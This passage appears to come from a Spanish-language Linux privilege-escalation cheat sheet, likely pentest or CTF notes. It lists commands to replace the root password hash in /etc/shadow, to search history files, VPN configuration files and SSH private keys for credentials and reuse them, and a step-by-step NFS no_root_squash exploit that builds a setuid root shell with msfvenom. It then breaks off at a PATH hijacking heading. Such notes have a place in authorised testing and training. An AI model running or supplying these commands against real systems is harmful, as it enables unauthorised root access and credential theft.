mkpasswd -m sha-512 <new_pass> # Hasheamos nueva pass.
nano /etc/shadow
# Sustituir hash pass de Root.
Rastros de Passes y Keys
History Files
cat ~/.history | less
Config Files
ls /home/<user>
cat /home/<user>/myvpn.ovpn
SSH Keys
ls -l home/<user>/.ssh
chmod 600 idrsa
ssh -i idrsa <user>@<IP>
'No Root Squash' Exploit - NFS
# Archivos creados por NFS guardan el ID remoto del user
cat /etc/exports # Buscar "no_root_squash" en algún campo
# En tu máquina
mkdir /tmp/nfs
mount -o rw,vers=2 <IPv>:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs shell.elf
# Máquina vícitima
/tmp/shell.elf
PATH Hijacking - Binario sin ruta absoluta en Script
